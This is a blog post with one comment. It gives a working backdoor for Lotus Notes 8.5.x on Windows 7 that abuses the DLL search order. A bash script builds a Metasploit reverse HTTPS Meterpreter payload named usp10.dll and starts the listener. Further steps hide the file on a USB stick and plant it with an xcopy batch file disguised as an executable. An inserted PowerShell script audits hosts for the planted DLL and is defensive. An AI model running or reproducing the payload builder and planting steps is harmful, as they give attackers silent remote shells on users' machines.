Backdooring Win7 and LotusNotes 8.5.x using Uniscribe dll path spoofing

Looking for DLL in all the wrong places,  Searching your Eyes looking for traces ..

Lotus Notes 8.5.x (up to 8.5.2 FP2) in a multi-user setup on Windows 7 (32-bit), in a workgroup or domain environment with roaming profiles, has a DLL search path weakness that can be abused to gain a remote shell on the system. No admin privileges are needed.


The Lotus Notes main executable, NLNOTES.EXE, searches for the Uniscribe DLL (usp10.dll) in all the wrong places ...

I will demonstrate how a specially crafted DLL can be planted on the system. Each time Lotus Notes is started, our backdoor connects back to our server and starts a reverse Meterpreter shell.

Let's start by creating our DLL payload with a small helper script. Save it in your Metasploit root folder and make it executable.

#!/bin/bash
echo "************************************************************"
echo "Lotus Notes 8.5.x DLL search order hijacking  Vulnerability "
echo "           Automatic shellcode generator                    "
echo "                                                            "
echo "************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IP="" # attacker IP the payload will call back to
case $OS in
   Linux) IP=`ifconfig tun0 | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   FreeBSD|OpenBSD) IP=`ifconfig tun0 | grep -E 'inet.[0-9]' | grep -v '127.0.0.1' | awk '{ print $2}'` ;;
   SunOS) IP=`ifconfig -a | grep inet | grep -v '127.0.0.1' | awk '{ print $2} '` ;;
   *) IP="Unknown";;
esac
#echo "$IP"
if [ -z "$IP" ] || [ "$IP" = "Unknown" ]; then
   echo "Could not determine the IP of tun0, change the interface name in this script"
   exit 1
fi
# Build the reverse HTTPS meterpreter stager and wrap it in the Metasploit DLL template,
# named after the Uniscribe DLL that NLNOTES.EXE looks for
./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode -t dll > usp10.dll
if [ ! -d ShellCode ]; then
mkdir ShellCode
fi
mv usp10.dll ShellCode
echo "****************************************************"
echo "         usp10.dll compiled - all done"
echo " DLL is located in ShellCode subfolder in Metasploit"
echo "      starting the meterpreter listener..."
echo "****************************************************"

# Start the handler; once the stager connects, migrate out of rundll32.exe into explorer.exe
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate explorer.exe' E

Change tun0 to the network interface you are actually using (eth0, eth1, wlan0, wlan1, ppp0, ...).

What happens here is basically this:

We create a reverse HTTPS Meterpreter payload and export it as a DLL named usp10.dll. NLNOTES.EXE looks for this particular DLL first inside a user-controlled folder, C:\Users\<user>\AppData\Local\Lotus\Notes\Data, and only if it does not find it there does it go on to the rest of the search path:

[debugger screenshots of NLNOTES.EXE probing for usp10.dll]

So we need to upload the Meterpreter DLL into this location and name it exactly usp10.dll. Every time Lotus starts, our DLL gets loaded silently, the stager migrates from rundll32.exe into explorer.exe, and we get a Meterpreter session on our listener.
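A check for the other side of this: the script below, added here as an example and not part of the original post, audits a Win7 host for exactly the condition just described. It assumes the per-user data directory is %LOCALAPPDATA%\Lotus\Notes\Data (the path the batch script later in this post writes to) and that the genuine Uniscribe DLL is the one in %SystemRoot%\System32; both are assumptions, not facts stated by the post. It reports whether the current user can write to the data directory (the precondition for the hijack), whether a usp10.dll is already sitting there, even with hidden and system attributes set, and how that file compares, by SHA-256 and Authenticode signature, with the Microsoft copy.

```powershell
# Added example, not code from the original post: audit a Windows host for a planted
# usp10.dll in the per-user Lotus Notes data directory that NLNOTES.EXE searches first.
# Assumptions (not stated by the post): the data dir is %LOCALAPPDATA%\Lotus\Notes\Data,
# the path the post's batch script writes to, and the genuine Uniscribe DLL is the one in
# %SystemRoot%\System32 (on 64-bit Windows a 32-bit Notes would use SysWOW64 instead).
# Written for Windows PowerShell 2.0, the Win7 default, so it avoids Get-FileHash.
param(
    [string]$DllName = 'usp10.dll',
    [string]$DataDir = (Join-Path $env:LOCALAPPDATA 'Lotus\Notes\Data')
)

function Get-Sha256Hex([string]$Path) {
    # SHA-256 of a file as lowercase hex, without Get-FileHash (PowerShell 4+ only)
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $stream = [System.IO.File]::OpenRead($Path)
    try     { $bytes = $sha.ComputeHash($stream) }
    finally { $stream.Close() }
    return ([System.BitConverter]::ToString($bytes)).Replace('-', '').ToLower()
}

function Test-DirectoryWritable([string]$Dir) {
    # The hijack needs a directory the interactive user can write to; probe it directly
    # rather than interpreting ACLs, which is error-prone with nested group membership.
    $probe = Join-Path $Dir ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        [System.IO.File]::Delete($probe)
        return $true
    } catch { return $false }
}

$planted = Join-Path $DataDir $DllName
$genuine = Join-Path $env:SystemRoot ('System32\' + $DllName)

if (-not (Test-Path -LiteralPath $DataDir)) {
    Write-Output "Notes data directory not found: $DataDir"
    return
}

Write-Output ("Data dir writable by {0}: {1}" -f $env:USERNAME, (Test-DirectoryWritable $DataDir))

# File.Exists sees hidden/system files, which attrib +h +s makes Explorer skip.
if (-not [System.IO.File]::Exists($planted)) {
    Write-Output "No $DllName in $DataDir (nothing planted, but the search path is still exposed)"
    return
}

$item = Get-Item -LiteralPath $planted -Force
Write-Output "FOUND $planted"
Write-Output ("  attributes : {0}" -f $item.Attributes)
Write-Output ("  size       : {0} bytes (genuine: {1} bytes)" -f $item.Length, (Get-Item -LiteralPath $genuine).Length)
Write-Output ("  sha256     : {0}" -f (Get-Sha256Hex $planted))
Write-Output ("  genuine    : {0}" -f (Get-Sha256Hex $genuine))

# A Metasploit-generated DLL carries no Authenticode signature; the Microsoft one does.
$sig = Get-AuthenticodeSignature -FilePath $planted
Write-Output ("  signature  : {0} ({1})" -f $sig.Status, $sig.SignerCertificate.Subject)
if ((Get-Sha256Hex $planted) -ne (Get-Sha256Hex $genuine) -or $sig.Status -ne 'Valid') {
    Write-Output "  VERDICT    : unexpected $DllName in a user-writable directory ahead of System32; treat as hijack"
}
```

Run it as the interactive user whose profile you want to check (the data directory is per-user, so an admin running it under a different profile tests the wrong path). A writable data directory with no DLL present is the normal state for a multi-user install and is what makes the hijack possible in the first place; only the hash or signature mismatch indicates a planted file.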

There are many ways to get the DLL onto the target, from social engineering tricks to more sophisticated methods. In our scenario I'm gonna use a USB stick formatted as NTFS. The DLL on it gets the attributes set by "attrib +r +h +s +a usp10.dll", so it is read-only, hidden and system; on most Windows systems Explorer will not display such a file. Next, a simple batch script copies the file into the desired folder:

@echo off
rem /h copies the hidden/system file, /r overwrites a read-only target, /y suppresses the overwrite prompt
xcopy usp10.dll %USERPROFILE%\appdata\local\lotus\notes\data /s /g /h /r /c /y

We can compile this into an exe, for example with the Bat To Exe Converter from F2KO: http://www.f2ko.de/downloads/Bat_To_Exe_Converter.zip

Or we can just inject this code into some other application on the USB stick and let it do its work.

Another way is to put the DLL and the executable on a Teensy++ and set it up as described in the previous article.


2 Responses to Backdooring Win7 and LotusNotes 8.5.x using Uniscribe dll path spoofing

  1. tricknicks says:

    Hello sir,
    Great job, sir.
    Which debugger did you use, as shown in the above screenshot? Please reply or mail me soon, sir.

    Thank you!!
